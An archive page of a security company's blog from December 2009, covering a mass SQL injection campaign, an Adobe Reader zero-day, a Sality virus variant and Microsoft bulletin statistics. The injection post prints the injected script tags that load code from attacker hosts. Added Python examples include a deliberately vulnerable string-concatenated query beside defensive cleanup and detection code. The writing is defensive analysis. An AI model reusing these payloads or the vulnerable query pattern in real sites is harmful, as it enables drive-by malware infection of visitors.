Archive for December, 2009

Dec 16 2009

More than 187.000 websites suffer from massive SQL injection attacks

Published by under Security Research

Recently, a new wave of massive SQL injection attacks has been detected by Bkis researchers. At the climax of the wave, according to Google search results, more than 187.000 websites were compromised.

Most of the websites in the infected list are Chinese, including Chinese government websites with .gov.cn domain names, .edu.cn websites…

[Screenshot: Google search results]

All these websites have an SQL injection flaw, and their databases have been injected many times with the following code: <script src=hxxp://wgwggg.cn:1/1.js></script>

(Update on 17 Dec 2009: According to our latest analysis, the hackers have injected new code into more than 178.000 websites, as follows: <script src=hxxp://a.118cc.cn></script>. You can see the Google search results here.)


[Screenshot: source of an infected website with the malicious script]

When users visit these websites, the script is executed and silently loads hidden iframes that pull exploit code from malicious websites, which then download malware to the users' computers.

[Screenshot: malicious code in the .js file]

[Screenshot: exploit tree]

The malicious websites use exploit code for the following vulnerabilities:

  • Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
  • MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
  • Microsoft Office Web Components vulnerabilities described in MS09-043
  • Microsoft video ActiveX vulnerability described in MS09-032
  • Internet Explorer Uninitialized Memory Corruption Vulnerability described in MS09-002.

A successful exploit silently downloads the file upload.css (detected by Bkav as W32.CSSExploit.Trojan) and installs it on the user's computer.

The virus W32.CSSExploit.Trojan has the following technical details:

  1. Drops the file %UserProfile%\[RandomName].drv
  2. Renames itself to "auto.exe" and copies itself to the %ProgramFiles%\Common Files\ folder
  3. Writes the registry key [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\auto]
  4. Registers a service named DrvKiller to run the virus at Windows start-up
  5. Copies an "autorun.inf" file and itself to all drives in order to spread
  6. Changes the browser homepage to http://www.playbo[removed]ing.com.cn:8788/
  7. Installs a backdoor that allows the hacker to remotely control the computer
  8. Downloads and executes many online-game password stealers and other malware on the infected computer

According to the analysis, the virus and the wave of attacks are suspected to originate from China.

We are still tracking and making further analysis on this attack.

Recommendations for prevention:

  • Up to now, many websites are still unfixed. Admins of these websites should quickly remove the malicious scripts injected into their databases and fix the websites' SQL injection flaws to prevent the next wave of attacks.
  • Users should install the latest Microsoft and Adobe patches.
  • Users should update their anti-virus software.
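As an added example (not code from the original post), the Python below illustrates the two admin-side steps in the first recommendation: a parameterised query in place of string concatenation, and a scan that finds and strips injected `<script src=...></script>` tags from text columns. The `news` table, its columns and the hxxp://example.invalid URLs are constructed stand-ins.

```python
import re
import sqlite3

# Shape of the payload described above: a <script src=...></script> tag appended
# to stored text; allows optional quotes and whitespace around the src value.
INJECTED_SCRIPT = re.compile(
    r'<script\s+src\s*=\s*["\']?[^>"\']+["\']?\s*>\s*</script>', re.IGNORECASE)

def vulnerable_search(conn, term):
    # The flaw class behind the attack: user input concatenated into the SQL text.
    sql = "SELECT id, title FROM news WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()

def safe_search(conn, term):
    # Hardened form: the input is bound as a parameter and never parsed as SQL.
    sql = "SELECT id, title FROM news WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()

def find_injected(conn, table, columns):
    """Return (rowid, column, value) for every text cell carrying an injected tag.
    table/columns are trusted identifiers chosen by the admin, not user input."""
    hits = []
    for col in columns:
        for rowid, value in conn.execute(f"SELECT rowid, {col} FROM {table}"):
            if isinstance(value, str) and INJECTED_SCRIPT.search(value):
                hits.append((rowid, col, value))
    return hits

def clean_injected(conn, table, columns):
    """Strip the injected tags in place; returns the number of cells rewritten."""
    fixed = 0
    for rowid, col, value in find_injected(conn, table, columns):
        cleaned = INJECTED_SCRIPT.sub("", value).strip()
        conn.execute(f"UPDATE {table} SET {col} = ? WHERE rowid = ?", (cleaned, rowid))
        fixed += 1
    conn.commit()
    return fixed

def demo_db():
    """Constructed in-memory table with two rows carrying injected tags."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", [
        (1, "Budget notice", "Plain text"),
        (2, "Exam schedule<script src=hxxp://example.invalid/1.js></script>",
            'Room list<script src="hxxp://example.invalid/1.js"></script>'),
        (3, "Holiday", "Closed on Friday<script src = hxxp://example.invalid></script>"),
    ])
    return conn
```

Run `find_injected` first to review what would change, then `clean_injected` on a backup before touching production data.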

Bkis


Dec 16 2009

New Javascript processing vulnerability in Adobe Reader and Adobe Acrobat

Published by under Security Research

On December 15, 2009, a critical zero-day vulnerability in Adobe Reader and Adobe Acrobat was announced together with exploit code. Taking advantage of this flaw, a hacker may place a .pdf file containing the exploit code on a website and trick users into clicking a link to the file. The malicious code is then executed and the hacker gains control over the computer.

Adobe's PDF processing software contains JavaScript processing modules, and the newly found flaw lies in these modules. Specifically, when the newplayer function is not properly processed, the software crashes. Taking advantage of JavaScript and the crash, a hacker can easily insert malicious code using the heap spray technique. Below is the exploit code analyzed by Bkis' experts:

[Screenshot: the exploit code in the pdf file]

In the meantime, the pdf file containing malicious code that exploits this flaw has become available. Additionally, Adobe has officially acknowledged this critical vulnerability, but cannot issue a patch yet. Thus, Bkis recommends that users be cautious with unknown links or email attachments.

Also, until Adobe releases the official patch, users are recommended to disable the JavaScript processing feature by following these steps: Edit >> Preferences >> JavaScript >> Enable JavaScript (untick it).


Dec 14 2009

New Sality has arrived

Published by under Security Research

A new variant of Sality, one of the most active families of metamorphic file infectors to date, has been released.

In this latest variant, Sality still uses its old methods to spread: it infects local and network disks, and it infects a copy of winmine.exe or notepad.exe and puts it onto removable drives with an autorun.inf file to execute the infector. However, instead of using the Entry Point Obscuring (EPO) technique of the previous variant, this variant uses a simpler method to gain control of the host PE file. It replaces the first instruction at the host entry point with a call instruction (E8 opcode). This call transfers control to the virus's metamorphic code at the end of the file, which then decrypts the virus body that does the main work. When the virus body runs, it looks for victims to infect. During this process, if a file's name is on Sality's blacklist (almost all filenames on this blacklist belong to security tools), the infector makes the file unable to execute properly by overwriting the instruction at its entry point with a ret instruction (C3 opcode). When the user then executes this file, the process terminates immediately.

In addition, Sality tries different ways to protect itself, such as disabling Windows Task Manager and Windows Registry Editor, attacking antivirus programs, keeping Windows Security Center from producing alert messages and preventing the user from using Windows in Safe Mode. The virus loads its kernel driver and registers its filter function with the Windows IP Traffic Filter Driver. In effect, Sality has its own custom firewall, which monitors the user's Internet traffic and prevents the computer from accessing antivirus vendors' websites. In this way, communication between users and antivirus vendors over the Internet is broken: antivirus programs can't connect to their sites to update their databases, and users can't get solutions from the vendors to solve their trouble. Furthermore, Sality downloads and executes other malware on the infected computer. All these tasks put users' systems at high risk: users' sensitive information can be stolen without their consent.

Back to the technical side: older versions of the virus used the RC4 algorithm to encrypt the main virus body, whereas the latest version uses a much simpler addition/subtraction/exclusive-OR scheme. However, the metamorphic code generated for decrypting the main virus body is more complex than in the older versions. It is harder to tell which instructions actually decrypt the virus body and which are only junk code, and which registers hold useful values and which do not. Antivirus programs must work more elaborately to collect enough parameters to decrypt the body and clean the virus from host files.
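As an added example (not the analyst's code), the Python below implements the two entry-point checks that this description suggests for a scanner: a CALL (E8) at the host entry point whose target lies in the tail of the file, where the appended metamorphic code would sit, and a bare RET (C3) at the entry point of a disabled security tool. It assumes the caller has already translated AddressOfEntryPoint to a file offset; the byte buffers are constructed stand-ins for a PE image, not real executables.

```python
import struct

CALL_REL32 = 0xE8   # opcode Sality writes over the host's first instruction
RET = 0xC3          # opcode written over a blacklisted tool's entry point

def call_target(code, entry_off):
    """File offset a rel32 CALL at entry_off lands on, or None if not a CALL."""
    if len(code) < entry_off + 5 or code[entry_off] != CALL_REL32:
        return None
    rel = struct.unpack_from("<i", code, entry_off + 1)[0]   # signed displacement
    return entry_off + 5 + rel                                # relative to next insn

def classify_entry(code, entry_off, tail_bytes=0x1000):
    """Verdicts for the two entry-point patterns described above.
    'call-to-tail': CALL whose target lies in the last tail_bytes of the file,
                    where the appended metamorphic decryptor would sit.
    'ret-stub':     entry point is a bare RET, the disabled-tool pattern.
    'normal':       anything else; legitimate code may start with a CALL too,
                    which is why the target, not the opcode alone, is checked."""
    if entry_off >= len(code):
        return "invalid"
    if code[entry_off] == RET:
        return "ret-stub"
    target = call_target(code, entry_off)
    if target is not None and len(code) - tail_bytes <= target < len(code):
        return "call-to-tail"
    return "normal"

def build_sample(kind, size=0x4000, entry_off=0x400):
    """Constructed stand-in for a PE image's raw bytes (not a real PE file).
    The caller is assumed to have mapped AddressOfEntryPoint to entry_off."""
    buf = bytearray(size)
    buf[entry_off:entry_off + 5] = b"\x55\x8b\xec\x83\xec"   # push ebp; mov ebp,esp; sub esp,..
    if kind == "ret-stub":
        buf[entry_off] = RET
    elif kind == "call-to-tail":
        blob = size - 0x200                    # "virus" code placed near the end of file
        struct.pack_into("<Bi", buf, entry_off, CALL_REL32, blob - (entry_off + 5))
    return bytes(buf)
```

On real files, resolve the entry point through the section table (for example with the pefile library) before calling `classify_entry`, and treat 'call-to-tail' as a heuristic to confirm rather than a verdict on its own.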

This variant of Sality is detected in our antivirus software, Bkav, as W32.SalityVI.PE.

Analyst: Nguyen Ngoc Zung


Dec 10 2009

Statistics on Microsoft Security Bulletins in 2009

Published by under Security Research

On 8th December, Microsoft released its last security bulletins of 2009. To give users an overall picture, Bkis has compiled statistics on the number of these bulletins, their maximum severity rating and the operating systems affected during 2009.

[Chart: Microsoft Security Bulletins and their severity for each month in 2009]

[Chart: Number of security bulletins per operating system since the release of Windows 7]

According to the above charts, by and large, the number of security bulletins released in 2009 approximates that of the previous year, 2008. More precisely, there were a total of 74 bulletins (78 in 2008), more than half of which (44 bulletins) were rated critical, meaning they might "allow the propagation of an Internet worm without user action", according to Microsoft's severity rating system. The number of bulletins per month reached its peak in October, with 13 bulletins, all of which were rated critical or important. In addition, it can be seen that more vulnerabilities were published and patched in the second half of the year than in the first half.

Since October 2009, the numbers of bulletins per operating system have been quite uniform, except for those of Windows 7 and Windows 2008 R2, which Microsoft had only just released near the end of the year and to which the corporation has applied new advanced technologies. Yet it is still too soon to assume that these new OSs are more secure than their predecessors, since they have only been on the market for 2 months.

By Hoang Xuan Minh
